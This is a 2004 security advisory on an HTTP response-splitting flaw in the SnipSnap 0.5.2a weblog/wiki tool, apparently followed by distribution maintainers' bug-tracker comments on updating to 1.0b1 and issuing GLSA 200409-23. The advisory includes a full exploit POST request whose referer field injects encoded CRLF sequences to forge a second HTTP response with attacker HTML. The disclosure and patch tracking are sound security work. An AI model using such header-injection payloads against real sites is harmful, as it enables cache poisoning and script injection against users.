ADVISORY Author: Maestro (me!) Date: 14-SEP-04 Vendor: SnipSnap (www.snipsnap.org) Product: SnipSnap 0.5.2a Product description (from vendor website): SnipSnap is a free and easy to install weblog and wiki tool written in Java. Problem: Http response splitting (web cache poisoning, xss, yadayadayada) - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf Exploit: POST /exec/authenticate HTTP/1.0 Host: cringe.dnsalias.com Content-Type: application/x-www-form-urlencoded Content-length: 197 referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d% 0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20%0d% 0a%0d%0a{html}0wned!!{/html}&cancel=cancel (replace curly braces with lessthan and greaterthan) Vendor status: vendor fixed in version 1.0B1. From vendor website: Tuesday, 14. September 2004 SnipSnap 1.0b1 (uttoxeter) released SnipSnap version 1.0b1 has just been released. This release was necessary due to the demand to get updates from 0.5.2a and a security issue know as HTTP response splitting found by someone called Maestro De-Seguridad. --
Java herd, please bump to release 1.0B1.
bumped
arches, please mark stable.
stabled
stable on ppc, x86 java and ppc removed from cc.
Ready for a GLSA decision
Yes, a GLSA is needed. lewk, the draft is yours.
glsa 200409-23